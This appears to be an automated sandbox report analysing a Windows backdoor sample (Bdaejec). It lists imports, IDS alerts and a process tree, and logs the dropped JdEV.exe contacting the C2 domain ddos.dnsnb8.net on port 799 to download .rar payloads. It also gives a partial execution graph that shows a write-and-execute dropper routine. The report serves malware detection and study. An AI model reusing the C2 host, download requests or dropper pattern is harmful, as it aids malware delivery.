                                                                USER32.dllRegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, GetMenuDefaultItem, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, GetUpdateRect, FrameRect, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageW, CreateMenu, IsMenu, UpdateLayeredWindow, EnableScrollBar, UnionRect, MonitorFromPoint, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, UnpackDDElParam, ReuseDDElParam, LoadImageW, InsertMenuItemW, TranslateAcceleratorW, CopyImage, DestroyIcon, LockWindowUpdate, BringWindowToTop, SetCursorPos, SetRect, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, CopyAcceleratorTableW, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateW, MessageBeep, ReleaseCapture, SetCapture, GetSystemMenu, LoadMenuW, IntersectRect, SetClassLongW, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, CreatePopupMenu, DestroyAcceleratorTable, SetParent, SetWindowRgn, IsZoomed, IsIconic, OffsetRect, IsRectEmpty, DestroyMenu, GetMenuItemInfoW, InflateRect, CharUpperW, ShowWindow, MoveWindow, IsDialogMessageW, CopyIcon, CheckDlgButton, RegisterWindowMessageW, LoadIconW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, IsWindow, SetFocus, GetForegroundWindow, SetActiveWindow, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, GetMessageTime, GetMessagePos, MonitorFromWindow, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, RedrawWindow, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, CallWindowProcW, GetMenu, SetWindowLongW, SetWindowPos, GetWindowTextLengthW, GetWindowThreadProcessId, GetLastActivePopup, PostQuitMessage, PostMessageW, RemoveMenu, GetSubMenu, GetMenuItemCount, IsWindowEnabled, EnableWindow, MessageBoxW, KillTimer, SetTimer, InvalidateRect, UpdateWindow, GetDesktopWindow, RealChildWindowFromPoint, GetWindow, GetDlgCtrlID, GetWindowRect, GetWindowLongW, GetClassNameW, PtInRect, CharUpperBuffW, GetDoubleClickTime, GetIconInfo, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, InvertRect, MapDialogRect, HideCaret, GetNextDlgGroupItem, GetWindowTextW, SetWindowTextW, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, ScreenToClient, GrayStringW, GetWindowRgn, DestroyCursor, DrawIcon, InsertMenuW, GetMenuItemID, AppendMenuW, GetMenuStringW, GetMenuState, ValidateRect, GetCursorPos, PeekMessageW, GetKeyState, SendMessageW, IsWindowVisible, GetActiveWindow, DispatchMessageW, TranslateMessage, GetMessageW, CallNextHookEx, SetWindowsHookExW, CheckMenuItem, EnableMenuItem, ModifyMenuW, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, SetCursor, ShowOwnedPopups, DeleteMenu, CopyRect, SetRectEmpty, GetMonitorInfoW, SystemParametersInfoW, EnumDisplayMonitors, GetSystemMetrics, GetSysColor, SetLayeredWindowAttributes, LoadCursorW, GetClientRect, MapWindowPoints, DefWindowProcW, GetClassInfoW, GetSysColorBrush, UnhookWindowsHookEx, FillRect, TabbedTextOutW, DrawTextW, DrawTextExW
                                                                GDI32.dllGetObjectType, CreateHatchBrush, GetTextExtentPoint32W, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CombineRgn, GetBkColor, GetTextColor, PatBlt, CreateEllipticRgn, Polyline, Ellipse, Polygon, SetRectRgn, DPtoLP, OffsetRgn, GetRgnBox, SetDIBColorTable, RealizePalette, StretchBlt, SetPixel, SelectPalette, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, EnumFontFamiliesExW, GetTextFaceW, SetPixelV, SetViewportOrgEx, SelectObject, Escape, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, CreateCompatibleBitmap, GetObjectW, CreateFontIndirectW, CreatePatternBrush, CreateSolidBrush, CreatePen, GetStockObject, CreateDIBitmap, CreateBitmap, CreateDCW, CopyMetaFileW, Rectangle, GetDeviceCaps, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, DeleteObject, GetTextCharsetInfo, EnumFontFamiliesW, GetTextMetricsW, BitBlt, CreateCompatibleDC, CreateRectRgnIndirect, OffsetViewportOrgEx
                                                                MSIMG32.dllTransparentBlt, AlphaBlend
                                                                COMDLG32.dllGetFileTitleW
                                                                WINSPOOL.DRVOpenPrinterW, DocumentPropertiesW, ClosePrinter
                                                                ADVAPI32.dllRegEnumKeyExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegQueryValueW, RegEnumKeyW
                                                                SHELL32.dllSHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, DragFinish, DragQueryFileW, SHAppBarMessage, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetDesktopFolder
                                                                COMCTL32.dllImageList_GetIconSize
                                                                SHLWAPI.dllPathStripToRootW, PathIsUNCW, PathRemoveFileSpecW, PathFindFileNameW, PathFindExtensionW
                                                                ole32.dllCoInitializeEx, DoDragDrop, CreateStreamOnHGlobal, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CoUninitialize, CoInitialize, CoCreateInstance, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoTaskMemFree, CoCreateGuid
                                                                OLEAUT32.dllSysStringLen, VariantClear, VariantChangeType, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocStringLen, VarBstrFromDate, VariantInit, SysAllocString, SysFreeString
                                                                gdiplus.dllGdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
                                                                OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
                                                                IMM32.dllImmReleaseContext, ImmGetContext, ImmGetOpenStatus
                                                                WINMM.dllPlaySoundW
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                ChineseChina
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2025-01-07T06:01:12.995032+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.11648591.1.1.153UDP
                                                                2025-01-07T06:01:13.644513+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.114973644.221.84.105799TCP
                                                                2025-01-07T06:01:17.906835+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.114976244.221.84.105799TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 7, 2025 06:01:13.250835896 CET49736799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:13.255666018 CET7994973644.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:13.255748987 CET49736799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:13.256761074 CET49736799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:13.261558056 CET7994973644.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:13.644340038 CET7994973644.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:13.644388914 CET7994973644.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:13.644512892 CET49736799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:14.106909990 CET49736799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:14.111707926 CET7994973644.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:17.532310009 CET49762799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:17.537163973 CET7994976244.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:17.537236929 CET49762799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:17.538038969 CET49762799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:17.542890072 CET7994976244.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:17.906630039 CET7994976244.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:17.906646967 CET7994976244.221.84.105192.168.2.11
                                                                Jan 7, 2025 06:01:17.906835079 CET49762799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:17.909173012 CET49762799192.168.2.1144.221.84.105
                                                                Jan 7, 2025 06:01:17.914071083 CET7994976244.221.84.105192.168.2.11
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 7, 2025 06:01:12.995032072 CET6485953192.168.2.111.1.1.1
                                                                Jan 7, 2025 06:01:13.197349072 CET53648591.1.1.1192.168.2.11
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 7, 2025 06:01:12.995032072 CET192.168.2.111.1.1.10x809bStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 7, 2025 06:01:08.653938055 CET1.1.1.1192.168.2.110xd406No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 7, 2025 06:01:08.653938055 CET1.1.1.1192.168.2.110xd406No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 7, 2025 06:01:13.197349072 CET1.1.1.1192.168.2.110x809bNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                • ddos.dnsnb8.net:799
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.114973644.221.84.1057997800C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 7, 2025 06:01:13.256761074 CET288OUTGET /cj//k1.rar HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: ddos.dnsnb8.net:799
                                                                Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.114976244.221.84.1057997800C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 7, 2025 06:01:17.538038969 CET288OUTGET /cj//k2.rar HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: ddos.dnsnb8.net:799
                                                                Connection: Keep-Alive


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:1
                                                                Start time:00:01:11
                                                                Start date:07/01/2025
                                                                Path:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\BXOZIGZEUa.exe"
                                                                Imagebase:0x1c0000
                                                                File size:1'700'352 bytes
                                                                MD5 hash:FA07873F37B171A5567A9B4B3F2C65EB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:00:01:11
                                                                Start date:07/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:00:01:11
                                                                Start date:07/01/2025
                                                                Path:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                Imagebase:0x340000
                                                                File size:15'872 bytes
                                                                MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 97%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:00:01:17
                                                                Start date:07/01/2025
                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 1608
                                                                Imagebase:0x4c0000
                                                                File size:483'680 bytes
                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:7.1%
                                                                  Total number of Nodes:1110
                                                                  Total number of Limit Nodes:21
                                                                  execution_graph 49960 366000 49962 366044 GetPEB 49960->49962 49963 366077 CreateFileA 49962->49963 49965 366265 49963->49965 49966 36622d 49963->49966 49967 366246 WriteFile 49966->49967 49968 366244 49966->49968 49969 366255 CloseHandle WinExec 49967->49969 49968->49969 49969->49965 49970 1ebc54 49971 1ebc6b 49970->49971 49972 1ebcab 49971->49972 49973 1ebc71 49971->49973 49978 1ebca9 49972->49978 50085 23ca2c 25 API calls 49972->50085 49981 1e6589 LocalAlloc PtInRect RaiseException ~_Task_impl 49973->49981 49975 1ebc77 49975->49978 49982 1cbb6b LocalAlloc RaiseException ~_Task_impl 49975->49982 49979 1ebc8a 49979->49978 49983 1eaca7 49979->49983 49981->49975 49982->49979 49985 1eacb3 __EH_prolog3_GS 49983->49985 49984 1eacf8 49986 1ead00 GetParent 49984->49986 49987 1ead34 49984->49987 49985->49984 49985->49986 50106 1e83ab 11 API calls _wcsupr_s_l_stat 49985->50106 50107 1d8f99 102 API calls 2 library calls 49986->50107 49988 1eadad 49987->49988 49995 1ead39 49987->49995 50086 1e6589 LocalAlloc PtInRect RaiseException ~_Task_impl 49988->50086 49991 1ead73 49999 1ead8c SetCursor 49991->49999 50000 1ead98 49991->50000 49993 1ead11 50108 1cbbb4 LocalAlloc RaiseException ctype 49993->50108 49995->49991 50111 1e83ab 11 API calls _wcsupr_s_l_stat 49995->50111 49996 1ead1c 49996->49987 50001 1ead22 GetParent 49996->50001 49999->50000 50112 23baaa 27 API calls 50000->50112 50109 1d8f99 102 API calls 2 library calls 50001->50109 50004 1ead6a UpdateWindow 50004->49991 50006 1ead2d 50110 1dce25 106 API calls ctype 50006->50110 50007 1eada8 50055 1eaee8 50007->50055 50008 1eadb7 50009 1eae24 50008->50009 50014 1eadf2 GetAsyncKeyState 50008->50014 50008->50055 50011 1eb20d 50009->50011 50012 1eae50 50009->50012 50131 1e66e9 LocalAlloc PtInRect RaiseException 50011->50131 50020 1eae8d 50012->50020 50113 1e83ab 11 API calls _wcsupr_s_l_stat 50012->50113 50014->50009 50016 1eae04 50014->50016 50015 1eb21e 50017 1eb233 50015->50017 50132 1cbb6b LocalAlloc RaiseException ~_Task_impl 50015->50132 50016->50009 50017->50055 50133 1e83ab 11 API calls _wcsupr_s_l_stat 50017->50133 50087 1e6589 LocalAlloc PtInRect RaiseException ~_Task_impl 50020->50087 50021 1eb254 UpdateWindow 50025 1eb26a 50021->50025 50024 1eae9a 50026 1eaeb0 50024->50026 50114 1cacff 50024->50114 50030 1eb2be SetCapture 50025->50030 50035 1eb277 ctype 50025->50035 50028 1eaeed 50026->50028 50029 1eaec7 50026->50029 50088 1e83ab 11 API calls _wcsupr_s_l_stat 50028->50088 50029->50055 50119 1e83ab 11 API calls _wcsupr_s_l_stat 50029->50119 50135 1d8f99 102 API calls 2 library calls 50030->50135 50034 1eaef7 UpdateWindow 50036 1eaf0b ctype 50034->50036 50134 1e83ab 11 API calls _wcsupr_s_l_stat 50035->50134 50041 1eaf88 50036->50041 50042 1eaf29 50036->50042 50039 1eb2ed RedrawWindow 50039->50055 50040 1eb2b3 UpdateWindow 50059 1eb1fd 50040->50059 50041->50059 50089 24baeb 31 API calls 50041->50089 50043 1eaf4f InflateRect 50042->50043 50044 1eaf60 SetCapture 50042->50044 50043->50044 50120 1d8f99 102 API calls 2 library calls 50044->50120 50047 1eaf6f SetCursor 50047->50059 50048 1eafb6 50090 24be4a 50048->50090 50051 1eb04e GetCursorPos ScreenToClient 50053 1eb077 PtInRect 50051->50053 50084 1eb19a 50051->50084 50052 1eb023 50121 24bb18 10 API calls 4 library calls 50052->50121 50060 1eb08f 50053->50060 50053->50084 50137 2beb42 50055->50137 50056 1eb1ac 50057 1eb1b6 InvalidateRect 50056->50057 50056->50084 50057->50084 50059->50055 50136 1e8b36 103 API calls 2 library calls 50059->50136 50060->50056 50061 1eb0c9 50060->50061 50122 1e6433 LocalAlloc RaiseException ~_Task_impl 50061->50122 50063 1eb0d8 RedrawWindow 50065 1eb107 GetParent 50063->50065 50123 1d8f99 102 API calls 2 library calls 50065->50123 50067 1eb118 50068 1eb13c 50067->50068 50070 1eb121 GetParent 50067->50070 50069 1eb15e GetParent 50068->50069 50074 1eb14e RedrawWindow 50068->50074 50125 1d8f99 102 API calls 2 library calls 50069->50125 50124 1d8f99 102 API calls 2 library calls 50070->50124 50073 1eb12c RedrawWindow 50073->50068 50074->50069 50075 1eb169 50126 1cbb6b LocalAlloc RaiseException ~_Task_impl 50075->50126 50077 1eb175 50078 1eb179 GetParent 50077->50078 50077->50084 50127 1d8f99 102 API calls 2 library calls 50078->50127 50080 1eb184 GetParent 50128 1d8f99 102 API calls 2 library calls 50080->50128 50082 1eb18f 50129 1cbbb4 LocalAlloc RaiseException ctype 50082->50129 50130 24bb18 10 API calls 4 library calls 50084->50130 50085->49978 50086->50008 50087->50024 50088->50034 50089->50048 50091 24be56 __EH_prolog3_GS 50090->50091 50140 24bd98 50091->50140 50093 24be67 50094 24be87 GetCursorPos SetRect 50093->50094 50095 24be7a CopyRect 50093->50095 50096 24bead 50094->50096 50095->50096 50097 24bec1 IsRectEmpty 50096->50097 50098 24beb8 50096->50098 50097->50098 50099 24becc InflateRect 50097->50099 50150 1c956a 31 API calls ctype 50098->50150 50099->50098 50101 24bee1 ctype 50102 24beeb moneypunct 50101->50102 50104 24bf1e DoDragDrop 50101->50104 50103 2beb42 ctype 5 API calls 50102->50103 50105 1eb015 IsWindow 50103->50105 50104->50102 50105->50051 50105->50052 50106->49984 50107->49993 50108->49996 50109->50006 50110->49987 50111->50004 50112->50007 50113->50020 50213 2bf7e9 50114->50213 50116 1cad1a __EH_prolog3 50216 1d1192 LocalAlloc 50116->50216 50118 1cad31 ~_Task_impl 50118->50026 50119->50055 50120->50047 50121->50055 50122->50063 50123->50067 50124->50073 50125->50075 50126->50077 50127->50080 50128->50082 50129->50084 50130->50059 50131->50015 50132->50017 50133->50021 50134->50040 50135->50059 50136->50039 50221 2bc787 50137->50221 50139 2beb4c 50139->50139 50141 24bda4 __EH_prolog3 50140->50141 50151 1cc69a 50141->50151 50145 24bddc 50146 24bde4 GetProfileIntW GetProfileIntW 50145->50146 50147 24be1a 50145->50147 50146->50147 50164 1d6268 LocalAlloc LeaveCriticalSection RaiseException ~_Task_impl 50147->50164 50149 24be21 ~_Task_impl 50149->50093 50150->50101 50165 1cf877 50151->50165 50154 1d61f6 50155 1d620b 50154->50155 50156 1d6206 50154->50156 50158 1d6219 50155->50158 50212 1d61d2 InitializeCriticalSection 50155->50212 50157 1cacff ~_Task_impl 2 API calls 50156->50157 50157->50155 50160 1d622b EnterCriticalSection 50158->50160 50161 1d6255 EnterCriticalSection 50158->50161 50162 1d624a LeaveCriticalSection 50160->50162 50163 1d6237 InitializeCriticalSection 50160->50163 50161->50145 50162->50161 50163->50162 50164->50149 50170 1d1632 50165->50170 50167 1cf886 50168 1cc6a4 50167->50168 50181 1d1231 8 API calls 3 library calls 50167->50181 50168->50154 50171 1d163e __EH_prolog3 50170->50171 50172 1cacff ~_Task_impl 2 API calls 50171->50172 50173 1d168c 50171->50173 50182 1d143b TlsAlloc 50171->50182 50186 1d1323 EnterCriticalSection 50171->50186 50172->50171 50200 1d11c5 EnterCriticalSection 50173->50200 50178 1d169f 50207 1d14e2 9 API calls 4 library calls 50178->50207 50179 1d16b2 ~_Task_impl 50179->50167 50181->50167 50183 1d146c InitializeCriticalSection 50182->50183 50184 1d1467 50182->50184 50183->50171 50208 1cacc7 RaiseException __CxxThrowException@8 50184->50208 50192 1d1346 50186->50192 50187 1d137f ctype 50193 1d1387 GlobalAlloc 50187->50193 50188 1d1394 GlobalHandle GlobalUnlock 50209 1cafc0 50188->50209 50189 1d141c LeaveCriticalSection 50189->50171 50190 1d1405 _memset 50190->50189 50192->50187 50192->50188 50192->50190 50195 1d13be 50193->50195 50194 1d13b2 GlobalReAlloc 50194->50195 50196 1d13e5 GlobalLock 50195->50196 50197 1d13c9 GlobalHandle GlobalLock 50195->50197 50198 1d13d7 LeaveCriticalSection 50195->50198 50196->50190 50197->50198 50211 1cacc7 RaiseException __CxxThrowException@8 50198->50211 50201 1d1207 LeaveCriticalSection 50200->50201 50202 1d11e0 50200->50202 50204 1d1210 50201->50204 50202->50201 50203 1d11e5 TlsGetValue 50202->50203 50203->50201 50205 1d11f1 50203->50205 50204->50178 50204->50179 50205->50201 50206 1d11f6 LeaveCriticalSection 50205->50206 50206->50204 50207->50179 50210 1cafd5 ctype 50209->50210 50210->50194 50212->50158 50214 2bf81e RaiseException 50213->50214 50215 2bf812 50213->50215 50214->50116 50215->50214 50217 1d11ab 50216->50217 50218 1d11a6 50216->50218 50217->50118 50220 1cacc7 RaiseException __CxxThrowException@8 50218->50220 50222 2bc78f 50221->50222 50223 2bc791 IsDebuggerPresent 50221->50223 50222->50139 50229 2d07c8 50223->50229 50226 2c3b41 SetUnhandledExceptionFilter UnhandledExceptionFilter 50227 2c3b5e __call_reportfault 50226->50227 50228 2c3b66 GetCurrentProcess TerminateProcess 50226->50228 50227->50228 50228->50139 50229->50226 50230 1c3230 50243 1c7680 50230->50243 50232 1c328a 50255 1c60f0 50232->50255 50235 1c32c7 50264 1c5110 50235->50264 50240 1c33af 50241 1c3386 50241->50240 50289 1c8570 71 API calls 2 library calls 50241->50289 50290 1c8570 71 API calls 2 library calls 50243->50290 50245 1c76ba 50291 1c8e6a 50245->50291 50248 1c7703 50248->50232 50250 1c76cf 50296 2d84e0 50250->50296 50337 1c7f90 50255->50337 50260 1c32a6 50260->50235 50288 1c8570 71 API calls 2 library calls 50260->50288 50261 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50262 1c614b 50261->50262 50263 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50262->50263 50263->50260 50366 2d83ee 50264->50366 50267 1c8e6a std::_Mutex::_Mutex 70 API calls 50268 1c5159 50267->50268 50274 1c32ea 50268->50274 50371 2d899b 73 API calls 9 library calls 50268->50371 50270 1c5167 50271 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50270->50271 50272 1c517a 50271->50272 50273 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50272->50273 50273->50274 50275 1c4120 50274->50275 50276 1c41f0 50275->50276 50277 1c4151 50275->50277 50276->50241 50373 2d86c3 50277->50373 50279 1c415f 50279->50276 50383 1c5200 EnterCriticalSection LeaveCriticalSection std::ios_base::_Addstd std::_Lockit::_Lockit 50279->50383 50281 1c417e 50384 1c67f0 108 API calls 4 library calls 50281->50384 50283 1c41cf 50283->50241 50284 1c418b 50284->50283 50285 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50284->50285 50286 1c41ae 50285->50286 50287 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50286->50287 50287->50283 50288->50235 50289->50240 50290->50245 50294 1c8e72 50291->50294 50293 1c76c1 50293->50248 50295 2d899b 73 API calls 9 library calls 50293->50295 50294->50293 50304 2be4b1 50294->50304 50295->50250 50297 1c76e2 50296->50297 50298 2d84f2 50296->50298 50300 2d8508 50297->50300 50335 2d8cdf EnterCriticalSection 50298->50335 50301 2d850f 50300->50301 50302 1c76f9 50300->50302 50336 2d8cef LeaveCriticalSection 50301->50336 50302->50232 50305 2be52e 50304->50305 50313 2be4bf 50304->50313 50329 2c8a17 DecodePointer 50305->50329 50307 2be534 50330 2be629 70 API calls __getptd_noexit 50307->50330 50310 2be4ed RtlAllocateHeap 50310->50313 50320 2be526 50310->50320 50312 2be51a 50327 2be629 70 API calls __getptd_noexit 50312->50327 50313->50310 50313->50312 50314 2be4ca 50313->50314 50318 2be518 50313->50318 50326 2c8a17 DecodePointer 50313->50326 50314->50313 50321 2c8466 70 API calls 2 library calls 50314->50321 50322 2c82b7 70 API calls 8 library calls 50314->50322 50323 2beb8b 50314->50323 50328 2be629 70 API calls __getptd_noexit 50318->50328 50320->50294 50321->50314 50322->50314 50331 2beb60 GetModuleHandleW 50323->50331 50326->50313 50327->50318 50328->50320 50329->50307 50330->50320 50332 2beb89 ExitProcess 50331->50332 50333 2beb74 GetProcAddress 50331->50333 50333->50332 50334 2beb84 50333->50334 50334->50332 50335->50297 50336->50302 50338 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50337->50338 50339 1c7fa9 50338->50339 50340 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50339->50340 50341 1c6121 50340->50341 50342 1c7310 50341->50342 50343 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50342->50343 50344 1c7342 50343->50344 50345 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50344->50345 50347 1c7386 50344->50347 50346 1c7365 50345->50346 50348 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50346->50348 50349 1c73c6 50347->50349 50363 1c7230 108 API calls 2 library calls 50347->50363 50348->50347 50350 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50349->50350 50352 1c612e 50350->50352 50352->50260 50352->50261 50353 1c73d4 50354 1c73f7 50353->50354 50364 2bcb99 70 API calls std::exception::exception 50353->50364 50356 2d84e0 std::_Lockit::_Lockit EnterCriticalSection 50354->50356 50358 1c740a 50356->50358 50357 1c73e9 50359 2bf7e9 __CxxThrowException@8 RaiseException 50357->50359 50360 2d8508 std::ios_base::_Addstd LeaveCriticalSection 50358->50360 50359->50354 50361 1c741e 50360->50361 50365 2d86e3 70 API calls std::_Mutex::_Mutex 50361->50365 50363->50353 50364->50357 50365->50349 50367 1c8e6a std::_Mutex::_Mutex 70 API calls 50366->50367 50368 2d83fa 50367->50368 50372 2d8cbf InitializeCriticalSection 50368->50372 50370 1c514b 50370->50267 50371->50270 50372->50370 50375 2d861b 50373->50375 50374 2d8666 50374->50279 50375->50374 50376 2d8680 50375->50376 50378 2d85fc std::_Xfsopen 147 API calls 50375->50378 50381 2d8687 50376->50381 50385 2d85fc 50376->50385 50378->50376 50381->50374 50388 2be05b 50381->50388 50383->50281 50384->50284 50402 2d8eea 50385->50402 50387 2d8616 50387->50374 50401 2c39d7 105 API calls 6 library calls 50387->50401 50389 2be067 ___lock_fhandle 50388->50389 50390 2be079 50389->50390 50391 2be08e 50389->50391 50832 2be629 70 API calls __getptd_noexit 50390->50832 50399 2be089 ___lock_fhandle 50391->50399 50810 2bd549 50391->50810 50393 2be07e 50833 2c406b 11 API calls __wcsicmp_l 50393->50833 50399->50374 50401->50381 50404 2d8ef6 ___lock_fhandle 50402->50404 50403 2d8f09 50461 2be629 70 API calls __getptd_noexit 50403->50461 50404->50403 50407 2d8f36 50404->50407 50406 